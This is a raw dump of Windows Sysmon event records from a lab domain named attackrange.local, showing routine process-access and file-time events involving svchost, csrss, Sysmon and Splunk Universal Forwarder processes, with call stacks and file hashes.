08:09:25.164{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810641Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.164{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810640Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.164{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F8B5-60EB-EB79-00000000D001}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810639Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.164{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8B5-60EB-EB79-00000000D001}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810638Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.164{0C1E0330-F8B5-60EB-EB79-00000000D001}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810682Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.851{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=54F3F15B693D4B9158FA0E1C869D1A07,SHA256=4214CA253B511B055CA81F0C908E35D98E9BA13A1C40E955A892B381B95B995D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810681Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.539{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8B6-60EB-ED79-00000000D001}776C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810680Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.539{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810679Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.539{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810678Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.539{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810677Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.539{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810676Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.539{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810675Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.539{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810674Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.539{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810673Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.539{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810672Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.539{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810671Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.539{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F8B6-60EB-ED79-00000000D001}776C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810670Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.539{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8B6-60EB-ED79-00000000D001}776C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810669Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.524{0C1E0330-F8B6-60EB-ED79-00000000D001}776C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810668Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.398{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF138AEE4096449CA8BA167CE2F382FE,SHA256=BEC58953703C5274EC18FFFE5322D5B1B8685FA8F4510106EAAEA6D6B812A626,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055276Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:26.068{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFE0DCFE491B7337A22E4BC5B4F72478,SHA256=8A70BA9872D7D4F60891405BAA215C0928F78C49D37DEDBD46359EC455C3390E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810710Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.914{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8B7-60EB-EF79-00000000D001}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810709Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.914{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810708Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.914{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810707Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.914{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810706Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.914{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810705Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.914{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810704Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.914{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 